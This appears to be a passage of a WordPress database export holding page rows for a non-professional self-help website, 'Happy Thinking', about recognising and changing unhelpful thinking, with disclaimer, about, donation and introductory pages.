(1585, 1, '2023-05-30 10:53:17', '2023-05-30 10:53:17', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1584,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/green_angel300523.jpg" alt="" class="wp-image-1584"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/test/">test images</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 10:53:17', '2023-05-30 10:53:17', '', 88, 'https://www.happythinking.com/?p=1585', 0, 'revision', '', 0),
(1586, 1, '2023-05-30 15:03:00', '2023-05-30 15:03:00', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1584,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/green_angel300523.jpg" alt="" class="wp-image-1584"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/test/">test images</a></p>\n<!-- /wp:paragraph -->', 'Change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 15:03:00', '2023-05-30 15:03:00', '', 88, 'https://www.happythinking.com/?p=1586', 0, 'revision', '', 0),
(1995, 1, '2023-07-02 09:21:20', '2023-07-02 09:21:20', '<!-- wp:paragraph -->\n<p>As a monk, Tila had travelled far and wide, staying in many spiritual places, in search of bits of wisdom about how to be happy. He came to reside in my neighbourhood and I jumped at the chance to learn from his experiences. I made an appointment to meet him in his small room at the meditation centre where he was staying.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When I arrived at the meditation centre, I found Tila standing near the doorway to his room. He greeted me with a broad smile and asked me, â€œI forgot to ask you, what is your name?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œPrasanna, but I am happy for people to call me Pras.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œHow very interesting! Your name, in the ancient language of Sanskrit, actually means to be happy, and here you are visiting me to learn how to be happyâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œI hope you will be able to make my name come true!â€, I genuinely said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila motioned me to enter his room, and as we entered, he asked, â€œSo you really want me to teach you how to be happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Somewhat startled by this direct question, all I could manage to say was, â€œYes!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After guiding me to sit on a small sofa next to his bed, he spoke, â€œWell Pras, let us start at the beginning! What do you think is the meaning of happiness? What does it mean,â€˜to be happyâ€™ ?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite desiring to be happy for so long, I suddenly realised that I never really had thought about what being happy actually meant.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila, probably realising that my answer was not going to come in a hurry, said, â€œDonâ€™t worry, I too struggled to come up with an answer when I was asked the same question many years ago. Even now, I have to ponder about it. In my current thinking, to be happy means different things to different people. To me, to be happy means to have a mind that is at peace despite all the stresses the world throws at it. Even with lots of challenges and difficult circumstances, if oneâ€™s mind can remain stress-free, in a good mood, and without worry and fear, then I think we can describe that person as being â€œhappyâ€. What do you think?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thankful that Tila had answered most of it, I just added my bit, â€œYes, I think I agree with how you describe what it is to be happy. I suffer, in various combinations, anxiety, depression and stress. I suppose not having these would make me a happy person.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila smiled, â€œYes, that makes sense. I am sure as we go along, we will both discover more and more about what it is to be happy. I am pleased to accompany you on this journey.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'What is happiness?', '', 'inherit', 'closed', 'closed', '', '1994-revision-v1', '', '', '2023-07-02 09:21:20', '2023-07-02 09:21:20', '', 1994, 'https://www.happythinking.com/?p=1995', 0, 'revision', '', 0),
(1817, 1, '2023-06-13 19:35:23', '2023-06-13 19:35:23', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common negative thinking patterns that can contribute to one being unhappy. Now that you understand these negative thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change negative thinking patterns into more helpful positive thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This one can be done using â€œtoolsâ€, something like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal, but instead, are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better detect when you are thinking in negative ways. i.e. you will become more â€œsensitiveâ€ in detecting negative thinking patterns when it happens in your mind. Other tools will help you to change negative thinking patterns into helpful positive thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect negative thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Negative thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/no-gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-06-13 19:35:23', '2023-06-13 19:35:23', '', 1641, 'https://www.happythinking.com/?p=1817', 0, 'revision', '', 0),
(451, 2, '2020-09-27 14:47:37', '2020-09-27 14:47:37', '<!-- wp:paragraph -->\n<p>The author of this website (www.happythinking.com) is NOT a professional mental health specialist and the information is provided in good faith. Please read and understand this disclaimer and terms of use before browsing this website. Essentially this website does not contain professional medical advice, so use the information at your own risk. Continued after image below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The content of this website is for informational purposes only. Nothing found on this website is intended to be a substitute for professional psychological, psychiatric or medical advice, diagnosis or treatment. This website accepts no responsibility for the results of any actions taken on the basis of information on this website, nor for the accuracy or completeness of any material contained herein. This website expressly disclaims all and any liability and responsibility to any person in respect of the consequences of anything done or omitted to be done by such person in reliance, whether wholly or partially, upon this website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Always seek the advice of your physician or other qualified mental health provider with any questions you may have regarding a medical condition or mental disorder. Never disregard professional medical advice or delay in seeking it because of something you have read on this website. If you think you may have a medical emergency (including a mental health emergency), call your doctor or emergency services immediately.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reliance on any information provided by this website or by any person or professional appearing on this website is solely at your own risk. this website is not liable for any advice or information provided. No warranties, either expressed or implied, are made on the information provided.<br>This website reserves the right to alter, amend, vary or otherwise change any information on this website at any time and without notice to you. The provision of any URL, link, and recommended reading material is done for the convenience of users of this internet site. It does not constitute an endorsement by this website of the information provided.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you find material on this website offensive, you may choose not to use the website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By reading this and/or by browsing this website, you have agreed to this disclaimer, as well as the websiteâ€™s terms and conditions of use. If you do not agree to this disclaimer or the terms and conditions of use, you should cease your use of this website immediately.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thank you very much for reading the above disclaimer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">HOME</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'Disclaimer', '', 'publish', 'closed', 'closed', '', 'disclaimer', '', '', '2023-06-21 16:12:51', '2023-06-21 16:12:51', '', 0, 'https://www.stopstupidthinking.com/?page_id=451', 0, 'page', '', 0),
(455, 2, '2020-09-27 14:51:35', '2020-09-27 14:51:35', '<!-- wp:paragraph -->\n<p>Thank you for offering to donate. Unfortunately I have not yet sorted out this page to accept donations so please do not worry. Thank you again !</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1297} /-->', 'Donate', '', 'publish', 'closed', 'closed', '', 'donate', '', '', '2020-09-27 14:51:35', '2020-09-27 14:51:35', '', 0, 'https://www.stopstupidthinking.com/?page_id=455', 0, 'page', '', 0),
(466, 1, '2020-09-27 15:00:23', '2020-09-27 15:00:23', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>You can contact me via this email:  web21@freshgasflow.com     Please mention "Happy Thinking" in the subject line. Thank you. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Before we proceed, it is important that you get to know a bit about who I am (and who I am not!). Your mind is very precious and I would like you to know something about me before you trust me.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I must emphasise to you that I am not a mental health professional and I do not have formal qualifications in the subject. So, please take the information on this website at your own risk (please read the disclaimer section of this website for more details).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now you may ask, â€œWhat qualifies me to run this website?â€ Well, perhaps like yourself, I too have been pondering about how to be happy. In my life, I have faced various challenges that have kept my mind often in an unhappy state. Over the years, I have thought about this issue and wondered if I could come up with a practical and easy-to-understand way of dealing with it.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I soon realised that the way oneâ€™s mind â€œthinksâ€, can play an important role if one is happy or not. When faced with challenges, I noticed that there seemed to be certain unhelpful ways of thinking that my mind did that caused me to be unhappy. I then thought that maybe an idea would be to deal with the issue like an engineer would deal with a faulty machine: i.e. recognise unhelpful ways of thinking and use tools to fix such thinking. So over the years, I learnt about the various unhelpful ways of thinking that oneâ€™s mind may do and then researched and experimented with various mental techniques (i.e. tools) that I could use to deal with such thinking. Having benefited from these techniques greatly, I felt that I should share such insights with others. I, therefore, made this website to fulfil this desire of sharing, with the hope that it will benefit many.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When reading the many â€œself-helpâ€ books and other resources out there, I often found them to be either too vague or too complex to be of practical value in my day to life. In view of this, my number one focus for this website was to make it easy to understand and give solutions that one can realistically use in oneâ€™s daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I also would like to stress that it is very important that if you are being cared for by a mental health professional, under no circumstances should you change your thinking or medication, without their approval. They are trained individuals unlike me, and also, suddenly changing medication can be very dangerous. On the other hand, please do share this website with them and please let me know what they think of it! Also, unfortunately, suicide is a very real risk in some and if you feel in any way inclined to do so, please contact professional helplines in your country and also seek out friends and family. Things may feel very low, but once someone lifts you up a bit, you will realise that there is hope.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So while I would like to make it clear that this website does not provide professional advice, I hope that you will assess the simple ideas I will present to you and if you find them sensible, use them in your life to make yourself a happier person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I have kept this website free so that everyone can benefit. However, if you are able to make a small donation equal to about a dollar, I would be very grateful if you would do so by clicking <a href="https://www.happythinking.com/donate/">HERE</a>.Â You will be then taken to a donate page. Every little bit will help me develop this website. Thank you. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim is for you to be happy and I am confident that the material on this website will help you to think in ways that will make you happy (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'About me', '', 'publish', 'closed', 'closed', '', 'about-me', '', '', '2023-08-09 18:45:16', '2023-08-09 18:45:16', '', 0, 'https://www.stopstupidthinking.com/?page_id=466', 0, 'page', '', 0),
(1602, 1, '2023-05-30 16:42:00', '2023-05-30 16:42:00', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"35px"} -->\n<div style="height:35px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 16:42:00', '2023-05-30 16:42:00', '', 1346, 'https://www.happythinking.com/?p=1602', 0, 'revision', '', 0),
(510, 2, '2020-10-04 07:56:53', '2020-10-04 07:56:53', '<!-- wp:heading -->\n<h2>Thank you very much !</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><span style="font-size: 14px;">I really appreciate your help. Your kind contribustion will defintely help me maintain and add new material to this website. Thank you.</span></p>\n<!-- /wp:paragraph -->', 'A big thank you !', '', 'publish', 'closed', 'closed', '', 'payment-confirmation', '', '', '2023-06-06 08:10:07', '2023-06-06 08:10:07', '', 0, 'https://www.stopstupidthinking.com/payment-confirmation/', 0, 'page', '', 0),
(511, 2, '2020-10-04 07:56:53', '2020-10-04 07:56:53', '<!-- wp:heading -->\n<h2>Payment failed ooops</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><span style="font-size: 14px;">I am just an ordinary guy trying to do my bit to improve the world !</span></p>\n<!-- /wp:paragraph -->', 'Payment Failed', '', 'publish', 'closed', 'closed', '', 'payment-failed', '', '', '2023-06-06 08:13:41', '2023-06-06 08:13:41', '', 0, 'https://www.stopstupidthinking.com/payment-failed/', 0, 'page', '', 0),
(1034, 1, '2021-04-10 13:44:49', '2021-04-10 13:44:49', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how â€œthe way one thinksâ€ can affect oneâ€™s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, letâ€™s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job. This type of thinking helps the person be as happy as possible given the circumstances, and is what I would call, â€œhelpful thinkingâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was unhelpful as it made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. This type of thinking just made the person feel worse and less able to solve his problems, and is what I call, â€unhelpful thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other personâ€™s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed unhelpful ways of thinking that can unnecessarily cause you to have an unhappy mental state. Such â€œunhelpful thinkingâ€ can create problems when none exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such unhelpful ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing unhelpful thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise unhelpful thinking, how can you change it? Therefore, to help you to recognise when unhelpful thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of unhelpful thinking that people 